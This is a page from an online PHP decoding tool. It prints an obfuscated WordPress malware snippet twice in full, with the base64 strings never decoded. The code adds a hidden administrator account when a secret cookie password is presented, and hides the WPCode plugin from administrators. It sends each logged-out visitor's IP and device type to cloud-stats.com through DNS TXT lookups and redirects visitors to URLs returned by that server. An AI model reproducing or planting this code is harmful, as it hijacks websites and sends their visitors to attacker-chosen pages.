Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$p0=base64_decode('NTQ4NjhjYTg0ZTAzNmM4YmIzYTU1OTNhYmI4NWUwMGM=');if(current_user_can(base..

Decoded Output download

<?  $p0=base64_decode('NTQ4NjhjYTg0ZTAzNmM4YmIzYTU1OTNhYmI4NWUwMGM=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8gIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($z1){unset($z1[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $z1;});}function _gcookie($y2){return(isset($_COOKIE[$y2]))?base64_decode($_COOKIE[$y2]):'';}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);if(!empty($p0)&&_gcookie(base64_decode('cHc='))===$p0){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$o3=_gcookie(base64_decode('ZA=='));if(strpos($o3,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$o3);}break;case base64_decode('YXU='):$m4=_gcookie(base64_decode('dQ=='));$d5=_gcookie(base64_decode('cA=='));$n6=_gcookie(base64_decode('ZQ=='));if($m4&&$d5&&$n6&&!username_exists($m4)){$x7=wp_create_user($m4,$d5,$n6);$j8=new WP_User($x7);$j8->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode('LA=='),$_SERVER[$v9])as $n10){$n10=trim($n10);if(filter_var($n10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $n10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$n10=_user_ip();if(!$n10){return;}$z11=get_transient(base64_decode('ZXhw'));if(!is_array($z11)){$z11=array();}foreach($z11 as $t12=>$d13){if(time()-$d13>86400){unset($z11[$t12]);}}if(key_exists($n10,$z11)&&(time()-$z11[$n10]<86400)){return;}$n14=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$s15=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$n10);$s15=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$s15);$r16=base64_decode('Y2xvdWQtc3RhdHMuY29t');$h17=get_option(base64_decode('ZA=='));if($h17&&strpos($h17,base64_decode('Lg=='))>0){$r16=$h17;}$z18=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$q19=(!$n14?base64_decode('dW5rLmNvbQ=='):$n14).base64_decode('Lg==').(!$s15?base64_decode('MC0wLTAtMA=='):$s15).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$z18:base64_decode('bmQ=')).base64_decode('Lg==').$r16;$h20=dns_get_record($q19,DNS_TXT);if(is_array($h20)&&!empty($h20)){if(isset($h20[0][base64_decode('dHh0')])){$h20=$h20[0][base64_decode('dHh0')];$h20=base64_decode($h20);if($h20==base64_decode('ZXJy')){$z11[$n10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$z11);}else if(substr($h20,0,4)===base64_decode('aHR0cA==')){$z11[$n10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$z11);wp_redirect($h20);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));} ?>

Did this file decode correctly?

Original Code

$p0=base64_decode('NTQ4NjhjYTg0ZTAzNmM4YmIzYTU1OTNhYmI4NWUwMGM=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8gIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($z1){unset($z1[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $z1;});}function _gcookie($y2){return(isset($_COOKIE[$y2]))?base64_decode($_COOKIE[$y2]):'';}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);if(!empty($p0)&&_gcookie(base64_decode('cHc='))===$p0){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$o3=_gcookie(base64_decode('ZA=='));if(strpos($o3,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$o3);}break;case base64_decode('YXU='):$m4=_gcookie(base64_decode('dQ=='));$d5=_gcookie(base64_decode('cA=='));$n6=_gcookie(base64_decode('ZQ=='));if($m4&&$d5&&$n6&&!username_exists($m4)){$x7=wp_create_user($m4,$d5,$n6);$j8=new WP_User($x7);$j8->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode('LA=='),$_SERVER[$v9])as $n10){$n10=trim($n10);if(filter_var($n10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $n10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$n10=_user_ip();if(!$n10){return;}$z11=get_transient(base64_decode('ZXhw'));if(!is_array($z11)){$z11=array();}foreach($z11 as $t12=>$d13){if(time()-$d13>86400){unset($z11[$t12]);}}if(key_exists($n10,$z11)&&(time()-$z11[$n10]<86400)){return;}$n14=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$s15=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$n10);$s15=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$s15);$r16=base64_decode('Y2xvdWQtc3RhdHMuY29t');$h17=get_option(base64_decode('ZA=='));if($h17&&strpos($h17,base64_decode('Lg=='))>0){$r16=$h17;}$z18=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$q19=(!$n14?base64_decode('dW5rLmNvbQ=='):$n14).base64_decode('Lg==').(!$s15?base64_decode('MC0wLTAtMA=='):$s15).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$z18:base64_decode('bmQ=')).base64_decode('Lg==').$r16;$h20=dns_get_record($q19,DNS_TXT);if(is_array($h20)&&!empty($h20)){if(isset($h20[0][base64_decode('dHh0')])){$h20=$h20[0][base64_decode('dHh0')];$h20=base64_decode($h20);if($h20==base64_decode('ZXJy')){$z11[$n10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$z11);}else if(substr($h20,0,4)===base64_decode('aHR0cA==')){$z11[$n10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$z11);wp_redirect($h20);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));}

Function Calls

base64_decode	2
current_user_can	1

Variables

$p0

54868ca84e036c8bb3a5593abb85e00c

Stats

MD5	fd22cd5bc0699091f0fe1cfccc5f8f93
Eval Count	0
Decode Time	81 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats